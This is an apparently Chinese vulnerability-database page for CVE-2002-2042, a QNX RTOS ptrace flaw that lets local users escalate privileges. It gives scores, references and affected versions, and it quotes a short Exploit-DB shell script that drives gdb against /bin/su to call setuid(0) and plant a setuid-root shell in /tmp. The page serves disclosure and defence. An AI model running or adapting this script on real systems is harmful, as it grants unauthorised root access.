CVE-2002-2042
CVSS7.2
发布时间 :2002-12-31 00:00:00
修订时间 :2008-09-05 16:32:10
NMCOES    

[原文]ptrace in the QNX realtime operating system (RTOS) 4.25 and 6.1.0 allows programs to attach to privileged processes, which could allow local users to execute arbitrary code by modifying running processes.


[CNNVD]QNX 'ptrace()'任意进程修改漏洞(CNNVD-200212-080)

        QNX实时操作系统(RTOS)4.25和6.1.0版本的程序附在享有特权的进程上。本地用户可以通过修改运行进程执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:qnx:rtos:4.25
cpe:/a:qnx:rtos:6.1.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2042
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-2042
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200212-080
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/4919
(UNKNOWN)  BID  4919
http://www.iss.net/security_center/static/9260.php
(UNKNOWN)  XF  qnx-rtos-process-modification(9260)

- 漏洞信息

QNX 'ptrace()'任意进程修改漏洞
高危 设计错误
2002-12-31 00:00:00 2005-10-20 00:00:00
本地  
        QNX实时操作系统(RTOS)4.25和6.1.0版本的程序附在享有特权的进程上。本地用户可以通过修改运行进程执行任意代码。

- 公告与补丁

        Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: vuldb@securityfocus.com.
        The vendor has reported that this issue will be resolved in QNX 6.4.0; please see the references for more information.

- 漏洞信息 (21507)

QNX 6.x 'ptrace()' Arbitrary Process Modification Vulnerability (EDBID:21507)
linux local
2002-06-03 Verified
0 badc0ded
N/A [点击下载]
source: http://www.securityfocus.com/bid/4919/info

The QNX implementation of 'ptrace()' is reportedly insecure. An unprivileged process may attach to a setuid program without restriction. Since the attaching process may view or edit memory, an attacker may exploit this issue to escalate privileges.

This issue affects QNX RTOS 6 prior to 6.4.0. 

#!/bin/sh

#include <std_shouts.h>
#include <std_disclaimer.h>
#http://www.badc0ded.com 

echo "#!/bin/sh" > /tmp/runme
echo cp /bin/sh /tmp/sh > /tmp/runme
echo chmod 4755 /tmp/sh >> /tmp/runme
chmod 755 /tmp/runme
echo r root -c /tmp/runme > /tmp/badc0ded
echo break *main+44 >> /tmp/badc0ded
echo c >> /tmp/badc0ded
echo "call setuid(0)" >> /tmp/badc0ded
echo c >> /tmp/badc0ded
gdb /bin/su  < badc0ded > /dev/null
echo "www.badc0ded.com"
sleep 1
rm /tmp/runme /tmp/badc0ded
/tmp/sh

		

- 漏洞信息

60028
QNX RTOS ptrace Running Process Subversion Arbitrary Code Execution
Input Manipulation
Loss of Integrity Solution Unknown
Exploit Public Uncoordinated Disclosure

- 漏洞描述

Unknown or Incomplete

- 时间线

2002-06-03 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

QNX 'ptrace()' Arbitrary Process Modification Vulnerability
Design Error 4919
No Yes
2002-06-03 12:00:00 2008-09-24 03:19:00
badc0ded <badc0ded@badc0ded.com>

- 受影响的程序版本

QNX RTOS 6.3.2
QNX RTOS 6.3
QNX RTOS 6.2.1
QNX RTOS 6.2 Update Patch A
QNX RTOS 6.2
QNX RTOS 6.1
QNX RTOS 6.3.0 SP3

- 漏洞讨论

The QNX implementation of 'ptrace()' is reportedly insecure. An unprivileged process may attach to a setuid program without restriction. Since the attaching process may view or edit memory, an attacker may exploit this issue to escalate privileges.

This issue affects QNX RTOS 6 prior to 6.4.0.

- 漏洞利用

The following exploit is available:

- 解决方案

Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: vuldb@securityfocus.com.

The vendor has reported that this issue will be resolved in QNX 6.4.0; please see the references for more information.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站